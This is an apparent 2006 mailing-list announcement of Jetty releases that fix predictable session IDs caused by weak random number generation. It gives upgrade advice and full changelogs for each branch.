Jetty releases 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3

All,

new releases of all branches of Jetty are now available to address a
security vulnerability that was brought to our attention.

Because Jetty's session manager was using a 64 bit random number
from a 48 bit random source, there were some bits of internal state
leaked in a session ID.  Apparently this reduces the work load of
a brute force attack to predict session IDs.  Jetty only adds
another 3 bits of environmental randomness to each session ID.

Predicting session IDs may be used by an attacker to interact with
another users session.

This has been fixed in 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3
and it is highly recommended that you upgrade to one of these
releases.  The new algorith uses SecureRandom if available, which
provides a larger internal random state. More than 64 bits of
environmental randomness are added to each session ID.

There have been lots of other things added in these releases as
well - so if you want a minimal patch just take the
AbstractSessionManager class from the relevant release or
contact me for some support.

Jetty-4.2.27 - 22 November 2006
 + Upgraded session ID generation to use SecureRandom
 + AJP protected against bad requests from mod_jk

Jetty-5.1.12 - 22 November 2006
 + Added support for TLS_DHE_RSA_WITH_AES_256_CBC_SHA
 + Upgraded session ID generation to use SecureRandom
 + Quote single quotes in cookies
 + AJP protected against bad requests from mod_jk
 + JETTY-154 Cookies ignore single quotes

jetty-6.0.2 - 22 November 2006
    + Moved all modules updates from 6.1pre2 to 6.0
    + Added concept of bufferred endpoint
    + Added conversion Object -> ObjectName for the result of method
calls made on MBeans
    + Added DataFilter configuration to cometd
    + added examples/test-jaas-webapp
    + Added extraClassPath to WebAppContext
    + Added hierarchical destroy of mbeans
    + Added ID constructor to AbstractSessionManager.Session
    + added isStopped() in LifeCycle and AbstractLifeCycle
    + Added override descriptor for deployment of RO webapps
    + add <Property> replacement in jetty xml config files
    + alternate optimizations of writer (use -Dbuffer.writers=true)
    + Allow session cookie to be refreshed
    + Apply queryEncoding to getQueryString
    + CGI example in test webapp
    + change examples/test-jndi-webapp so it can be regularly built
    + Default soLinger is -1 (disabled)
    + ensure "" returned for ServletContext.getContextPath() for
root context
    + ensure sessions nulled out on request recycle; ensure session
null after invalidate
    + ensure setContextPath() works when invoked from jetty-web.xml
    + fixed NIO endpoint flush. Avoid duplicate sends
    + Fixed NPE in bio.SocketEndPoint.getRemoteAddr()
    + Fixed resource cache flushing
    + Fixed tld parsing for maven plugin
    + HttpGenerator can generate requests
    + Improved *-mbean.properties files and specialized some MBean
    + JETTY-118 ignore extra content after close.
    + JETTY-119 cleanedup Security optimizatoin
    + JETTY-123 handle windows UNC paths
    + JETTY-126 handle content > Integer.MAX_VALUE
    + JETTY-129 ServletContextListeners called after servlets are
initialized
    + JETTY-151 Idle timeout only applies to blocking operations
    + JETTY-151 refactored writers
    + JETTY-154 Cookies are double quotes only
    + JETTY-171 Fixed filter mapping
    + JETTY-172 use getName() instead of toString
    + JETTY-173 restore servletpath after dispatch
    + Major refactor of SelectChannel EndPoint for client selector
    + make .tag files work in packed wars
    + Plugin shutdown context before stopping it.
    + Refactored session lifecycle and additional tests
    + release resource lookup in Default servlet
    + (re)make JAAS classes available to webapp classloader
    + Reverted UnixCrypt to use coersions (that effected results)
    + Session IDs can change worker ID
    + Simplified ResourceCache and Default servlet
    + SocketConnector closes all connections in doStop
    + Upgraded session ID generation to use SecureRandom
    + updated glassfish jasper to tag SJSAS-9_1-B25-EA-08_Nov_2006
    + Support TLS_DHE_RSA_WITH_AES_256_CBC_SHA

jetty-6.1.0pre3 - 22 November 2006
    + fixed NIO endpoint flush. Avoid duplicate sends
    + Upgraded session ID generation to use SecureRandom
    + updated glassfish jasper to tag SJSAS-9_1-B25-EA-08_Nov_2006
    + Support TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    + JETTY-180 xbean for context deployer
    + JETTY-154 Cookies are double quotes only
    + Expose isResumed on Continuations
    + Refactored AJP generator

-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV